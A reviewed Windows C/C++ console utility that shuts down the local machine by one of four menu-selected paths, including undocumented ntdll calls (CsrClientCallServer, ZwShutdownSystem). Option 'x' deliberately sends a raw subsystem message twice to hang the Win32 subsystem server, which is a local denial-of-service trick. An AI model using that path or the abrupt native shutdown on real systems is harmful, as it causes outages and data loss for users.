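/*
 * Console utility that powers off the local Windows machine through one of
 * four paths chosen interactively: the documented ExitWindowsEx() call, a raw
 * message sent to the Win32 subsystem server, the native ZwShutdownSystem()
 * call, or the raw message sent twice (which the menu describes as hanging
 * the server).
 *
 * Security notes for reviewers:
 *  - Every path depends on the caller holding the shutdown privilege, so the
 *    "Shut down the system" user right is the control that limits who can
 *    trigger it.
 *  - Only the shutdown privilege is enabled here. Enabling every privilege
 *    present in the token is unnecessary for a shutdown request and widens
 *    what this process can do if it is misused.
 *  - The raw subsystem opcodes are only defined for OS major versions 4 and 5.
 *    On any other version the message is not sent at all.
 *
 * NOTE(review): the two header names were missing from the listing; the set
 * below is what the code needs to compile.
 */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SE_SHUTDOWN_PRIVILEGE (19L)

/*
 * Undocumented ntdll exports. The return values are NTSTATUS codes, where a
 * negative value means failure, so they are declared as LONG rather than left
 * to an implicit int.
 */
extern "C" {
LONG NTAPI CsrClientCallServer(PVOID message, DWORD, DWORD opcode, DWORD);
LONG NTAPI ZwShutdownSystem(DWORD Action);
LONG NTAPI RtlAdjustPrivilege(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
}

enum {
    kExitFlagsPowerOff   = 8,          /* "8 - Power off" in the original */
    kNativePowerOff      = 2,          /* action value for ZwShutdownSystem */
    kCsrMessageSize      = 64,         /* raw message buffer size, in bytes */
    kCsrExitFlagsSlot    = 11,         /* DWORD index that receives the flags */
    kCsrCallLastArgument = 0x10,       /* presumably a payload length; confirm */
    kCsrOpcodeMajor4     = 0x00030a00,
    kCsrOpcodeMajor5     = 0x00030400
};

/* Enable SeShutdownPrivilege, and nothing else, in the process token. */
static BOOL enable_shutdown_privilege(void)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp;
    BOOL ok = FALSE;

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        return FALSE;
    }

    memset(&tp, 0, sizeof tp);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    /*
     * AdjustTokenPrivileges() reports success even when the privilege was not
     * assigned, so the last-error value has to be checked as well.
     */
    if (LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tp.Privileges[0].Luid) &&
        AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL) &&
        GetLastError() == ERROR_SUCCESS) {
        ok = TRUE;
    }

    CloseHandle(hToken);
    return ok;
}

/* Map the OS major version to the subsystem opcode; 0 means "unknown". */
static DWORD csr_opcode_for(const OSVERSIONINFO *osver)
{
    if (osver->dwMajorVersion == 4) {
        return kCsrOpcodeMajor4;
    }
    if (osver->dwMajorVersion == 5) {
        return kCsrOpcodeMajor5;
    }
    return 0;
}

/* Allocate a zeroed raw message with the power-off flag set; caller frees. */
static BYTE *new_csr_exit_message(void)
{
    BYTE *message = (BYTE *)calloc(1, kCsrMessageSize);

    if (message != NULL) {
        *((DWORD *)message + kCsrExitFlagsSlot) = kExitFlagsPowerOff;
    }
    return message;
}

/*
 * Load user32.dll and build the raw message for the detected OS version.
 * Returns NULL, after printing the reason, when the version has no known
 * opcode or a resource could not be obtained. The opcode is never left at 0
 * and passed on, which is what the unchecked version did on other releases.
 */
static BYTE *prepare_csr_request(const OSVERSIONINFO *osver, DWORD *opcode)
{
    BYTE *message;

    *opcode = csr_opcode_for(osver);
    if (*opcode == 0) {
        fprintf(stderr, "No subsystem opcode known for OS major version %lu\n",
                (unsigned long)osver->dwMajorVersion);
        return NULL;
    }
    if (LoadLibraryA("user32.dll") == NULL) {
        fprintf(stderr, "LoadLibrary(user32.dll) failed: %lu\n",
                (unsigned long)GetLastError());
        return NULL;
    }
    message = new_csr_exit_message();
    if (message == NULL) {
        fprintf(stderr, "Out of memory\n");
    }
    return message;
}

/*
 * Entry point: detect the OS version, enable the shutdown privilege, print the
 * menu and run the selected path. Returns 0 when the request was issued and 1
 * when a step failed or the choice was not recognised.
 */
int main()
{
    OSVERSIONINFO osver;
    DWORD opcode = 0;
    BYTE *message = NULL;
    BOOLEAN was_enabled = FALSE;
    LONG status = 0;
    int rc = 0;

    /* Determine the running version; on failure the major version stays 0. */
    memset(&osver, 0x00, sizeof(OSVERSIONINFO));
    osver.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if (!GetVersionEx(&osver)) {
        fprintf(stderr, "GetVersionEx failed: %lu\n",
                (unsigned long)GetLastError());
        osver.dwMajorVersion = 0;
    }

    /* Best effort: without the privilege the calls below fail on their own. */
    if (!enable_shutdown_privilege()) {
        fprintf(stderr, "Could not enable the shutdown privilege: %lu\n",
                (unsigned long)GetLastError());
    }

    printf("Enter method:\n");
    printf("0 - standard\n");
    printf("1 - exotic\n");
    printf("2 - quick\n");
    printf("x - hang the server\n");

    switch (getchar()) {
    case '0': /* Standard exit through the documented API. */
        if (!ExitWindowsEx(kExitFlagsPowerOff, 0)) {
            fprintf(stderr, "ExitWindowsEx failed: %lu\n",
                    (unsigned long)GetLastError());
            rc = 1;
        }
        break;

    case '1': /* Send the request to the subsystem server directly. */
        message = prepare_csr_request(&osver, &opcode);
        if (message == NULL) {
            rc = 1;
            break;
        }
        status = CsrClientCallServer(message, 0, opcode, kCsrCallLastArgument);
        if (status < 0) {
            fprintf(stderr, "CsrClientCallServer failed: 0x%08lx\n",
                    (unsigned long)status);
            rc = 1;
        }
        free(message);
        break;

    case '2': /* Quick exit through the native API. */
        /* presumably skips the orderly user-mode shutdown sequence; confirm */
        status = RtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE, TRUE, FALSE,
                                    &was_enabled);
        if (status < 0) {
            fprintf(stderr, "RtlAdjustPrivilege failed: 0x%08lx\n",
                    (unsigned long)status);
            rc = 1;
            break;
        }
        status = ZwShutdownSystem(kNativePowerOff);
        if (status < 0) {
            fprintf(stderr, "ZwShutdownSystem failed: 0x%08lx\n",
                    (unsigned long)status);
            rc = 1;
        }
        break;

    case 'x':
        /*
         * Same message as option 1, submitted twice in a row. The original
         * author marks this combination as lethal for the server, i.e. a
         * local availability failure rather than a clean power-off.
         */
        message = prepare_csr_request(&osver, &opcode);
        if (message == NULL) {
            rc = 1;
            break;
        }
        status = CsrClientCallServer(message, 0, opcode, kCsrCallLastArgument);
        status = CsrClientCallServer(message, 0, opcode, kCsrCallLastArgument);
        free(message);
        break;

    default:
        printf("Wrong choice\n");
        rc = 1;
    }

    return rc;
}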